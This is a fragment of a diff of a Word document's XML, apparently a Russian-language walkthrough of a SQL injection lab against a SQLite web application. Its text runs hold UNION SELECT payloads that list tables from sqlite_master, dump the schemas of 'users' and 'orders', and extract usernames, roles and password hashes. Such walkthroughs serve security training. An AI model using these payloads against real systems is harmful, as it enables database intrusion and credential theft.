+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>user_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>content TEXT NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>created_at</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">FOREIGN </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>KEY(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>product_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>reviews</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -937,6 +2618,37 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">LIMIT 1 OFFSET </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>4--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+      </w:pPr>
+      <w:r>
+        <w:t>НИЧЕГО</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -947,33 +2659,88 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:t>Узнаем</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>структуру</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>таблицы</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>orders</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">– </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>' UNION</w:t>
+        <w:t>sql,NULL</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>group_concat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(name,','),NULL,NULL FROM </w:t>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -987,7 +2754,19 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> WHERE type='table'--</w:t>
+        <w:t xml:space="preserve"> WHERE name='</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>orders</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'--</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1008,100 +2787,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> – </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'users,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite_sequence</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>products,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>reviews,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>orders,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>order_items</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>secrets'</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1112,150 +2797,11 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Узнаем</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>структуру</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>таблицы</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>пользователи</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sql,NULL,NULL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite_master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE name='users'--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Результат</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>CREATE TABLE users (</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CREATE TABLE orders (</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1267,31 +2813,17 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GER PRIMARY KEY AUTOINCREMENT,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">id INTEGER PRIMARY KEY </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AUTOINCREMENT,</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1303,1832 +2835,253 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sername</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TEXT NOT NULL UNIQUE,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>password_hash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TEXT NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>role</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>TEXT NOT NULL DEFAULT 'user',</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>xss_solved</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL DE</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="357"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>group_concat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>role</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>,','),</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>NULL,NULL FROM users</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="357"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>group_concat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sername</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>,','),</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>NULL,NULL FROM user</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>s--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="357"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sername</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>NULL,NULL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM user</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="357"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>password_hash,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>NULL,NULL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM user</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="357"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Узнаем</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>структуру</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>таблицы</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>_</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sequence</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">– </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sql,NULL,NULL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
